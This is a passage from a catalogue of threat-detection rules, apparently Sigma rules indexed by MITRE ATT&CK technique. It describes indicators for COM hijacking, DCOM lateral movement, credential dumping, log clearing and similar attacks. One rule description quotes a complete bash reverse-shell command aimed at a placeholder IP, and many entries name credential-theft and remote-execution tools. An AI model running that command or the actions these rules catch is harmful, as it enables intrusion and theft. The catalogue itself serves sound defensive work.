    Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
  • COM Object Hijacking Via Modification Of Default System CLSID Default Value - Level: high
    Description: Detects potential COM object hijacking via modification of default system CLSID.
  • Potential Persistence Via Scrobj.dll COM Hijacking - Level: medium
    Description: Detects use of scrobj.dll, as this DLL looks for the ScriptletURL key to get the location of the script to execute
  • COM Hijacking via TreatAs - Level: medium
    Description: Detects modification of the TreatAs key to enable the "rundll32.exe -sta" command
  • SOURGUM Actor Behaviours - Level: high
    Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
attack.t1021.003 11
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon - Level: critical
    Description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.
  • Remote DCOM/WMI Lateral Movement - Level: high
    Description: Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security - Level: high
    Description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.
  • Potential DCOM InternetExplorer.Application DLL Hijack - Level: critical
    Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
  • Potential DCOM InternetExplorer.Application DLL Hijack - Image Load - Level: critical
    Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
  • Suspicious WSMAN Provider Image Loads - Level: medium
    Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
  • Suspicious Non PowerShell WSMAN COM Provider - Level: medium
    Description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
  • HackTool - Potential Impacket Lateral Movement Activity - Level: high
    Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
  • MMC20 Lateral Movement - Level: high
    Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
  • MMC Spawning Windows Shell - Level: high
    Description: Detects a Windows command line executable started from MMC
  • Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp - Level: high
    Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
attack.t1059.004 11
  • AWS EC2 Startup Shell Script Change - Level: high
    Description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
  • Suspicious Commands Linux - Level: medium
    Description: Detects relevant commands often related to malware or hacking activity
  • Equation Group Indicators - Level: high
    Description: Detects suspicious shell commands used in various Equation Group scripts and tools
  • Suspicious Activity in Shell Commands - Level: high
    Description: Detects suspicious shell commands used in various exploit codes (see references)
  • Suspicious Reverse Shell Command Line - Level: high
    Description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
  • JexBoss Command Sequence - Level: high
    Description: Detects a suspicious command sequence used by JexBoss
  • Linux Reverse Shell Indicator - Level: critical
    Description: Detects bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
  • BPFtrace Unsafe Option Usage - Level: medium
    Description: Detects the usage of the unsafe bpftrace option
  • Nohup Execution - Level: medium
    Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
  • Interactive Bash Suspicious Children - Level: medium
    Description: Detects suspicious interactive bash as a parent to rather uncommon child processes
  • Privilege Escalation Preparation - Level: medium
    Description: Detects suspicious shell commands indicating the information gathering phase that precedes privilege escalation.
attack.t1587.001 11
  • ProxyLogon MSExchange OabVirtualDirectory - Level: critical
    Description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory
  • Uncommon File Created In Office Startup Folder - Level: high
    Description: Detects the creation of a file with an uncommon extension in an Office application startup folder
  • VHD Image Download Via Browser - Level: medium
    Description: Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
  • PUA - CsExec Execution - Level: high
    Description: Detects the use of the lesser-known remote execution tool CsExec, a PsExec alternative
  • PsExec/PAExec Escalation to LOCAL SYSTEM - Level: high
    Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
  • Potential PsExec Remote Execution - Level: high
    Description: Detects potential PsExec commands that initiate execution on remote systems via common command line flags used by the utility
  • Potential Privilege Escalation To LOCAL SYSTEM - Level: high
    Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges
  • Formbook Process Creation - Level: high
    Description: Detects Formbook-like process executions that inject code into a set of files in the System32 folder, which then execute a special command line to delete the dropper from the AppData Temp folder. False positives are avoided by excluding all parent processes with command line parameters.
  • Mustang Panda Dropper - Level: high
    Description: Detects specific process parameters as used by Mustang Panda droppers
  • Conti Volume Shadow Listing - Level: high
    Description: Detects a command used by conti to find volume shadow backups
  • Creation of an Executable by an Executable - Level: low
    Description: Detects the creation of an executable by another executable.
attack.t1574.011 11
  • Service Registry Key Read Access Request - Level: low
    Description: Detects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
  • Service Registry Permissions Weakness Check - Level: medium
    Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
  • Suspicious Service DACL Modification Via Set-Service Cmdlet - PS - Level: high
    Description: Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (works only in PowerShell 7)
  • Abuse of Service Permissions to Hide Services Via Set-Service - PS - Level: high
    Description: Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (works only in PowerShell 7)
  • Abuse of Service Permissions to Hide Services Via Set-Service - Level: high
    Description: Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (works only in PowerShell 7)
  • Potential Privilege Escalation via Service Permissions Weakness - Level: high
    Description: Detects modification of service configuration (ImagePath, FailureCommand and ServiceDLL) in the registry by processes with Medium integrity level
  • Changing Existing Service ImagePath Value Via Reg.EXE - Level: medium
    Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
  • Possible Privilege Escalation via Weak Service Permissions - Level: high
    Description: Detects the sc.exe utility being spawned by a user with Medium integrity level to change a service ImagePath or FailureCommand
  • Service DACL Abuse To Hide Services Via Sc.EXE - Level: high
    Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
  • Service Security Descriptor Tampering Via Sc.EXE - Level: medium
    Description: Detects the sc.exe utility adding a new service with special permissions that hide that service.
  • Potential Persistence Attempt Via Existing Service Tampering - Level: medium
    Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
attack.t1055.001 10
  • Suspicious In-Memory Module Execution - Level: low
    Description: Detects access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a DLL loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. In addition, it is not common to see so few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown), which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
  • MavInject Process Injection - Level: high
    Description: Detects process injection using the signed Windows tool Mavinject32.exe
  • HackTool - Potential CobaltStrike Process Injection - Level: high
    Description: Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons
  • ManageEngine Endpoint Central Dctask64.EXE Potential Abuse - Level: high
    Description: Detects the execution of "dctask64.exe", a binary signed by ZOHO Corporation and part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Mavinject Inject DLL Into Running Process - Level: high
    Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
  • Potential DLL Injection Or Execution Using Tracker.exe - Level: medium
    Description: Detects potential DLL injection and execution using "Tracker.exe"
  • Renamed ZOHO Dctask64 Execution - Level: high
    Description: Detects execution of a renamed "dctask64.exe", a binary signed by ZOHO Corporation and part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Renamed Mavinject.EXE Execution - Level: high
    Description: Detects the execution of a renamed version of the "Mavinject" process, which can be abused to perform process injection using the "/INJECTRUNNING" flag
  • TAIDOOR RAT DLL Load - Level: high
    Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
  • CreateRemoteThread API and LoadLibrary - Level: medium
    Description: Detects potential use of the CreateRemoteThread API and the LoadLibrary function to inject a DLL into a process
attack.t1134.001 10
  • HackTool - NoFilter Execution - Level: high
    Description: Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Security - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • Potential Access Token Abuse - Level: medium
    Description: Detects potential token impersonation and theft, for example when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS" flag.
  • Meterpreter or Cobalt Strike Getsystem Service Installation - System - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • HackTool - Koh Default Named Pipe - Level: critical
    Description: Detects creation of default named pipes used by the Koh tool
  • HackTool - Impersonate Execution - Level: medium
    Description: Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively
  • Potential Meterpreter/CobaltStrike Activity - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
  • HackTool - SharpImpersonation Execution - Level: high
    Description: Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively
  • HackTool - SharpDPAPI Execution - Level: high
    Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Level: critical
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
attack.t1003.005 9
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Cred Dump Tools Dropped Files - Level: high
    Description: Detects the creation of files with well-known filenames (parts of credential dumping software or files produced by it)
  • HackTool - Credential Dumping Tools Named Pipe Created - Level: critical
    Description: Detects well-known credential dumping tools execution via specific named pipe creation
  • New Generic Credentials Added Via Cmdkey.EXE - Level: medium
    Description: Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface.
  • Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE - Level: high
    Description: Detects usage of cmdkey to look for cached credentials on the system
  • HackTool - Mimikatz Execution - Level: high
    Description: Detects well-known Mimikatz command line arguments
  • Dumping of Sensitive Hives Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
attack.t1218.008 9
  • Application Whitelisting Bypass via DLL Loaded by odbcconf.exe - Level: medium
    Description: Detects defence evasion attempt via odbcconf.exe execution to load DLL
  • Driver/DLL Installation Via Odbcconf.EXE - Level: medium
    Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.
  • Suspicious Driver/DLL Installation Via Odbcconf.EXE - Level: high
    Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.
  • New DLL Registered Via Odbcconf.EXE - Level: medium
    Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
  • Odbcconf.EXE Suspicious DLL Location - Level: high
    Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
  • Potentially Suspicious DLL Registered Via Odbcconf.EXE - Level: high
    Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't have a ".dll" extension, which is often used as a method to evade defenses.
  • Response File Execution Via Odbcconf.EXE - Level: medium
    Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
  • Suspicious Response File Execution Via Odbcconf.EXE - Level: high
    Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
  • Uncommon Child Process Spawned By Odbcconf.EXE - Level: medium
    Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
attack.t1218.005 9
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
  • HackTool - CACTUSTORCH Remote Thread Creation - Level: high
    Description: Detects remote thread creation from CACTUSTORCH as described in references.
  • Csc.EXE Execution Form Potentially Suspicious Parent - Level: high
    Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
  • Remotely Hosted HTA File Executed Via Mshta.EXE - Level: high
    Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
  • Suspicious JavaScript Execution Via Mshta.EXE - Level: high
    Description: Detects execution of javascript code using "mshta.exe".
  • Potential LethalHTA Technique Execution - Level: high
    Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
  • Suspicious MSHTA Child Process - Level: high
    Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
  • MSHTA Suspicious Execution 01 - Level: high
    Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
attack.t1021.006 9
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647), which allows remote code execution (RCE) as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP); the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Potential Remote PowerShell Session Initiated - Level: high
    Description: Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicate a remote PowerShell connection.
  • Remote PowerShell Session (PS Classic) - Level: low
    Description: Detects remote PowerShell sessions
  • Remote PowerShell Session (PS Module) - Level: high
    Description: Detects remote PowerShell sessions
  • Enable Windows Remote Management - Level: medium
    Description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
  • Execute Invoke-command on Remote Host - Level: medium
    Description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
  • Remote LSASS Process Access Through Windows Remote Management - Level: high
    Description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
  • HackTool - WinRM Access Via Evil-WinRM - Level: medium
    Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
  • Remote PowerShell Session Host Process (WinRM) - Level: medium
    Description: Detects remote PowerShell sessions by monitoring for wsmprovhost (the WinRM host process) as a parent or child process (a sign of an active PowerShell remote session).
attack.t1218.007 9
  • MSI Installation From Web - Level: medium
    Description: Detects installation of a remote msi file from web.
  • PowerShell WMI Win32_Product Install MSI - Level: medium
    Description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
  • DllUnregisterServer Function Call Via Msiexec.EXE - Level: medium
    Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
  • Suspicious MsiExec Embedding Parent - Level: medium
    Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
  • Suspicious Msiexec Execute Arbitrary DLL - Level: medium
    Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
  • Msiexec Quiet Installation - Level: medium
    Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
  • Suspicious Msiexec Quiet Install From Remote Location - Level: medium
    Description: Detects usage of Msiexec.exe to quietly install remotely hosted packages
  • MsiExec Web Install - Level: medium
    Description: Detects suspicious msiexec process starts with web addresses as parameter
  • Msiexec.EXE Initiated Network Connection Over HTTP - Level: low
    Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications.
attack.t1588.002 9
  • Hacktool Execution - Imphash - Level: critical
    Description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
  • Hacktool Execution - PE Metadata - Level: high
    Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
  • Renamed SysInternals DebugView Execution - Level: high
    Description: Detects suspicious renamed SysInternals DebugView execution
  • Potential Execution of Sysinternals Tools - Level: low
    Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
  • PUA - Sysinternal Tool Execution - Registry - Level: low
    Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
  • Suspicious Execution Of Renamed Sysinternals Tools - Registry - Level: high
    Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
  • PUA - Sysinternals Tools Execution - Registry - Level: medium
    Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
  • Usage of Renamed Sysinternals Tools - RegistrySet - Level: high
    Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
  • Suspicious Keyboard Layout Load - Level: medium
    Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
attack.t1003.006 8
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Mimikatz Use - Level: high
    Description: This method detects Mimikatz keywords in different event logs (some of them only appear in older Mimikatz versions that are nevertheless still used by different threat groups)
  • Active Directory Replication from Non Machine Account - Level: critical
    Description: Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.
  • Mimikatz DC Sync - Level: high
    Description: Detects Mimikatz DC sync security events
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Suspicious Get-ADReplAccount - Level: medium
    Description: The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
  • HackTool - Mimikatz Execution - Level: high
    Description: Detects well-known Mimikatz command line arguments
attack.t1555.003 8
  • Accessing Encrypted Credentials from Google Chrome Login Database - Level: medium
    Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
  • Access to Browser Login Data - Level: medium
    Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • HackTool - WinPwn Execution - Level: high
    Description: Detects command line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • PUA - WebBrowserPassView Execution - Level: medium
    Description: Detects the execution of WebBrowserPassView.exe, a password recovery tool that reveals the passwords stored by the following web browsers: Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
  • SQLite Chromium Profile Data DB Access - Level: high
    Description: Detects usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
  • Potential Browser Data Stealing - Level: medium
    Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
  • Access To Browser Credential Files By Uncommon Applications - Security - Level: low
    Description: Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential attempt at credential stealing. This rule requires heavy baselining before usage.
attack.t1070.001 8
  • Security Event Log Cleared - Level: medium
    Description: Checks for event id 1102 which indicates the security event log was cleared.
  • Security Eventlog Cleared - Level: high
    Description: One of the Windows event logs has been cleared, e.g. caused by "wevtutil cl" command execution
  • Eventlog Cleared - Level: medium
    Description: One of the Windows event logs has been cleared, e.g. caused by "wevtutil cl" command execution
  • Important Windows Eventlog Cleared - Level: high
    Description: Detects the clearing of one of the Windows core event logs, e.g. caused by "wevtutil cl" command execution
  • Suspicious Eventlog Clear - Level: medium
    Description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs
  • Suspicious Windows Trace ETW Session Tamper Via Logman.EXE - Level: high
    Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
  • Suspicious Eventlog Clearing or Configuration Change Activity - Level: high
    Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique was seen used by threat actors and ransomware strains in order to evade defenses.
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
attack.t1053.002 8
  • Remote Schedule Task Lateral Movement via ATSvc - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task via ATSvc
  • Remote Schedule Task Lateral Movement via ITaskSchedulerService - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task
  • Remote Schedule Task Lateral Movement via SASec - Level: high
    Description: Detects remote RPC calls to create or execute a scheduled task via SASec
  • Scheduled Task/Job At - Level: low
    Description: Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
  • MITRE BZAR Indicators for Execution - Level: medium
    Description: Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
  • Remote Task Creation via ATSVC Named Pipe - Zeek - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with the ATSVC named pipe
  • Remote Task Creation via ATSVC Named Pipe - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with the ATSVC named pipe
  • Interactive AT Job - Level: high
    Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
attack.t1564.001 8
  • Hidden Files and Directories - Level: low
    Description: Detects an adversary creating a hidden file or directory, by detecting directories or files with "." as the first character
  • Hiding Files with Attrib.exe - Level: medium
    Description: Detects usage of attrib.exe to hide files from users.
  • Set Suspicious Files as System Files Using Attrib.EXE - Level: high
    Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
  • Use Icacls to Hide File to Everyone - Level: medium
    Description: Detects use of icacls to deny access for everyone in the Users folder, sometimes used to hide malicious files
  • Registry Persistence via Service in Safe Mode - Level: high
    Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
  • Displaying Hidden Files Feature Disabled - Level: medium
    Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.
  • PowerShell Logging Disabled Via Registry Key Tampering - Level: high
    Description: Detects changes to the registry for the currently logged-in user in order to disable PowerShell module logging, script block logging or transcription and script execution logging
  • Set Files as System Files Using Attrib.EXE - Level: low
    Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files
attack.t1518.001 8
  • Security Software Discovery - Linux - Level: low
    Description: Detects usage of system utilities (only grep and egrep for now) to discover security software
  • System Integrity Protection (SIP) Disabled - Level: medium
    Description: Detects the use of csrutil to disable System Integrity Protection (SIP). This technique is used in post-exploitation scenarios.
  • System Integrity Protection (SIP) Enumeration - Level: low
    Description: Detects the use of csrutil to view the System Integrity Protection (SIP) status. This technique is used in post-exploitation scenarios.
  • Security Software Discovery - MacOs - Level: medium
    Description: Detects usage of system utilities (only grep for now) to discover security software
  • Security Software Discovery Via Powershell Script - Level: medium
    Description: Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus
  • Security Tools Keyword Lookup Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.
  • Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE - Level: high
    Description: Detects usage of "findstr" with the argument "385201", which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet - Level: low
    Description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.
attack.t1059.006 8
  • File Was Not Allowed To Run - Level: medium
    Description: Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.
  • Suspicious File Characteristics Due to Missing Fields - Level: medium
    Description: Detects executables in the Downloads folder without FileVersion, Description, Product or Company fields, likely created with py2exe
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution - Level: medium
    Description: Detects a potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, as part of the attack chain, threat actors used PowerShell commands that executed as child processes of the legitimate Tomcat "prunsrv.exe" process application.
  • Emotet Loader Execution Via .LNK File - Level: high
    Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign.
  • Serpent Backdoor Payload Execution Via Scheduled Task - Level: high
    Description: Detects a post-exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious Windows event and a trigger so that once the event is created, it executes the payload.
  • Python Path Configuration File Creation - Linux - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Python Path Configuration File Creation - MacOS - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Python Path Configuration File Creation - Windows - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
attack.t1134.002 8
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Security - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • Meterpreter or Cobalt Strike Getsystem Service Installation - System - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • Potential Meterpreter/CobaltStrike Activity - Level: high
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
  • PUA - AdvancedRun Execution - Level: medium
    Description: Detects the execution of AdvancedRun utility
  • PUA - AdvancedRun Suspicious Execution - Level: high
    Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
  • Suspicious Child Process Created as System - Level: high
    Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Level: critical
    Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
  • Detection of Possible Rotten Potato - Level: high
